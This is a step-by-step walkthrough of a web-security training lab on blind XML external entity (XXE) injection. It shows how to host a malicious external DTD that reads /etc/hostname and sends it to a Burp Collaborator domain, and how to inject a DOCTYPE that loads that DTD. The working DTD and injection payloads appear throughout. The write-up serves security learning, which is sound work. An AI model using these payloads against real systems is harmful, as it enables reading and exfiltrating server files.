This is our 5th article on XXE and XML injection. Today, we will solve the lab on exploiting blind XXE to exfiltrate data using a malicious external DTD. We will follow easy steps to solve the lab, but before that, I will explain the lab and the method to attack it in theory. In this lab, the output doesn’t show the result directly, so we will inject a malicious DTD file on our server. We will fetch this malicious file through the vulnerable XML or XML External Entity path and exploit the lab.
Lab Description Of Exploiting blind XXE using a malicious external DTD
In this lab, we are instructed that there is a “check stock” feature available that parses XML input. However, this feature does not display any results. To solve the lab, we need to fetch the
/etc/hostname file from the server. For this, you will need Burp Suite Professional, and we will be using Burp Collaborator.
Firstly, visit the lab.
After visiting the lab, you will see two options in the menu. The first option is “Go to Exploit Server,” and the second option is “Submit a Solution.”
Now, click on the “Exploit Server” option and assume that this is your own server where you need to host the malicious DTD file.
<!ENTITY % file SYSTEM "file:///etc/hostname"> <!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://BURP-COLLABORATOR-SUBDOMAIN/?x=%file;'>"> %eval; %exfil;
So, the above is our malicious DTD file which we will simply modify. First, open your Burp Collaborator. After opening it, copy the payload and paste it into the malicious DTD file.
<!ENTITY % file SYSTEM "file:///etc/hostname"> <!ENTITY % eval "<!ENTITY % exfil SYSTEM ''http://u504ox9vhlnsq0cudsys8giwyn4ds2.oastify.com/?x=%file;'>"> %eval; %exfil;
The above DTD file is the final version. Now, store it by clicking on the “Store” button.
I have combined two screenshots together for your convenience. Clicking on “View Exploit” after storing it will display the stored exploit on the server in the next tab.
After this, the steps are quite easy. Let’s proceed to solve the lab.
Now, simply enable your proxy in Burp Suite and navigate to the lab. Once you are in the lab, view any product and after viewing, you will find a “Check Stock” button. Intercept the request containing the button click in Burp Suite and send it to the Repeater tab.
In the Repeater tab, you need to modify the XML. Use the following code:
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]>
In the above code, replace “YOUR-DTD-URL” with the path of your malicious DTD file that you stored on the server.
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://exploit-0a060092039bf8cc83686025014500b7.exploit-server.net/exploit"> %xxe;]>
You can see that after following this process, I have received DNS and HTTP requests on Burp Collaborator.
I simply appended the extension “.dtd” to the name of the exploit. You can see that I have obtained the hostname. Even if you don’t include the extension, the task will still be completed.
When I submitted the hostname, our lab “Exploiting blind XXE to exfiltrate data using a malicious external DTD” was successfully solved. Congratulations!